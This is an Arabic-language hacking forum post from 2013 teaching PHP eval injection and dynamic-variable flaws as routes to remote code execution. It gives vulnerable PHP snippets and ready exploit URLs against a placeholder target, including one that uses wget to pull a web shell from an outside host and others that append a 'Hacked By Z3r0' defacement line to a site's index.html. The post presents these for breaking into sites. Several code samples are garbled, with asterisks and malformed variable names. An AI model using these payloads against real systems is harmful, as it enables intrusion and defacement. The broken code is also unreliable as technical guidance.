عرض مشاركة واحدة
قديم 06-03-2013, 06:06 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Injection
:: Interactive Developer ::
 
الصورة الرمزية Injection
 

 

 
إحصائية العضو





Injection غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Injection is on a distinguished road

افتراضي Dynamic Evaluation Variables | By Z3r0H4xor


السلام عليكم ورحمة الله وبركاتة

سلام يارجالة اخباركم ايه ؟

اليوم بنتكلم عن البحث عن الثغرات في المتغيرات الديناميكية وكلنا نعرف انه لغة بي اتش بي مهمة في الاختراق كثير واكتشاف الثغرات بشكل كبير لنة المخترق يعتمد على ثغره ليخترق موقع معين , ونعرف انه سكربتات معروفة مبرمجة بل بي اتش بي مثل " Wordpress , Mybb, Joomla " استغلال المتغيرات الديناميكة تقدر تقول RCE ( Remote Code Execution التي تسمح بتنفيذ امر معين

كود PHP:
Dynamic Evaluation Variables 
تمام الان نبدا بـ


كود PHP:
Eval Injection 
الـ Eval Injection معروفة بـ RCE لما الهكر يتحكم بل ( String ) وحالة حال eval()


مثال

كود PHP:
$common-variable "command";
 
$x $_GET['arg'];
 eval(
"\$common-variable = \$x;"); 
نفس مانشوف مافيه علامة دولار في المتغير , يمكن ان نتخطاه عبر المدخلات الخاصة

وفي السطر الثاني التطبيق يسمح اننه ندخل واستخدام الـ $ للحصول على الارسال البيانات التطبيق
والخالدم لتنفيذها. ونحن ننظر في السطر الثالث ونشوف eval() وضيفتة يتم استدعاء
وهاذا تنفيذ سلاسل 2 المذكورة فوق وهاذا مثال بسيط عن استغلاله

كود PHP:
<?php
    $cmd
=$_GET['cmd'];
    eval(
$cmd);
    
?>
الاستغلال يحلوين يكون بهاذا الشكل ض1


كود PHP:
http://www.target.com/php-files/input.php?cmd=wget  www.mysite.com/shell.php 
نعرف انه فيه كثير ناس يحبون لغة البي اتش بي هي لفة بسيطة ولكنها قويه

الي تجي معها كثير وضايف , البي اتش بي يدعم المتغيرات وهي المتغيرات او التعيبرات
الي تقيم الى اسماء المتغيرات الاخرى < ~ مجرد تفكير في هاذا , ويقول لي ان لايسبب مشاكل
هذا التعبيرات ممكن استخدامها لتغير حيوي متغير الى يتم الوصول اليها او تععيين اثناء
تنفيذ البرنامج مريحة جدا ولكن فكر مره ثانية وراح يكون التفكير ان هاذا هو
غير امنة اذا لم تتم السيطرة على اسم المتغير او مظهره يمكن للمهاجم قراءة او كتابة
المتغيرات التعسفي مما تسبب حتى الان تنفيذ التعليمات البرمجية بعيد عن اخر .

مثال

كود PHP:
$var**** = "myvar";
 $
$var**** = 10;
 echo 
$myvar
هاذا بيطلب متغير $myvar وبيطبع الـ String عشرة " 10"


كود PHP:
$safevar "Welcome to my site";
 
$param1 "";
 
$param2 "";
 
$param3 "";
 
# my own "register globals" for param[1,2,3]
 
foreach ($_GET as $key => $value) {
    $
$key $value;
    echo 
$value;
 } 
زي مانسشوف الحين الملف يستخدم الطباعة Echo , Print ويطبع عباره " مرحبا بك في موقعي "

طبعا المخترق يقدر يستغل الثغره في متغير $safevar لشيء ثاني ولنقول مثلا
"echo Hacked By Z3r0 >> /home/var/www/public_html/index.html"

وتستغل بهاذي الطريقة

كود PHP:
 http://www.target.com/php-files/input.php?safevar=echo Hacked By  z3r0>> /home/var/www/public_html/index.html 
&


كود PHP:
$function-**** = "myfunction";
 
$Arg1 "hello";
 
$Arg2 "welcome to my site";
 $
$function-****("Arg1""Arg2");
 echo 
$myfunction
طريقة الاستغلال


كود PHP:
  http://www.target.com/php-files/input.php?Arg1=hello&Arg2=echo  Hacked By Z3r0 >>  /home/var/www/public_html/index.html 
انتهينا من الدرس ض1 بس حاب انبهه الي ماعجبة الدرس مايرد ض1


كتبتة لنة الملل سوا فايدة كبيرة خخخخ

grt'z : Dr.Aadil, Mr.Hx , alzh3r, PreStiGe511, Nok511 , All Members



Dynamic Evaluation Variables | By Z3r0H4xor

   

رد مع اقتباس